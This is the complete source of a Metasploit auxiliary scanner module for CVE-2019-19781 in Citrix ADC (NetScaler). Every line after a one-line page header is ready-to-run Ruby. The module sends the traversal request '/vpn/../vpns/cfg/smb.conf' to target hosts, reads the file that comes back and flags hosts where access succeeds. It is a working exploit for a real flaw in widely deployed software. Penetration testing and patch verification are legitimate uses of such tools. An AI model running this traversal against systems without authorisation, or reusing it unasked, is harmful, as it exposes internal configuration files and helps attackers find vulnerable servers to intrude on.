Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7

8
  include Msf::Exploit::Remote::HttpClient
9
  include Msf::Auxiliary::Scanner
10
  include Msf::Auxiliary::Report
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Citrix ADC (NetScaler) Directory Traversal Scanner',
15
      'Description'    => %{
16
        This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC
17
        (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request
18
        /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of
19
        a "[global]" directive in smb.conf, which this file should always contain.
20
      },
21
      'Author'         => [
22
        'Mikhail Klyuchnikov', # Discovery
23
        'Erik Wynter',         # Module (@wyntererik)
24
        'altonjx'              # Module (@altonjx)
25
      ],
26
      'References'     => [
27
        ['CVE', '2019-19781'],
28
        ['URL', 'https://web.archive.org/web/20200111095223/https://support.citrix.com/article/CTX267027/'],
29
        ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']
30
      ],
31
      'DisclosureDate' => '2019-12-17',
32
      'License'        => MSF_LICENSE,
33
      'Notes'          => {
34
        'AKA'          => ['Shitrix']
35
      }
36
    ))
37

38
    register_options([
39
      OptString.new('TARGETURI', [true, 'Base path', '/']),
40
      OptString.new('PATH',      [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])
41
    ])
42
  end
43

44
  def run_host(target_host)
45
    turi = normalize_uri(target_uri.path, datastore['PATH'])
46

47
    res = send_request_cgi(
48
      'method' => 'GET',
49
      'uri'    =>  turi
50
    )
51

52
    unless res
53
      print_error("#{full_uri(turi)} - No response, target seems down.")
54

55
      return Exploit::CheckCode::Unknown
56
    end
57

58
    unless res.code == 200
59
      print_error("#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.")
60
      vprint_error("Obtained HTTP response code #{res.code} for #{full_uri(turi)}.")
61

62
      return Exploit::CheckCode::Safe
63
    end
64

65
    if turi.end_with?('smb.conf')
66
      unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\[\s*global\s*\]/)
67
        vprint_warning("#{turi} does not contain \"[global]\" directive.")
68
      end
69
    end
70

71
    print_good("#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.")
72
    msg = "Obtained HTTP response code #{res.code} for #{full_uri(turi)}. " \
73
          "This means that access to #{turi} was obtained via directory traversal."
74
    vprint_good(msg)
75

76
    report_vuln(
77
      host: target_host,
78
      name: name,
79
      refs: references,
80
      info: msg
81
    )
82

83
    Exploit::CheckCode::Vulnerable
84
  end
85

86
end
87

88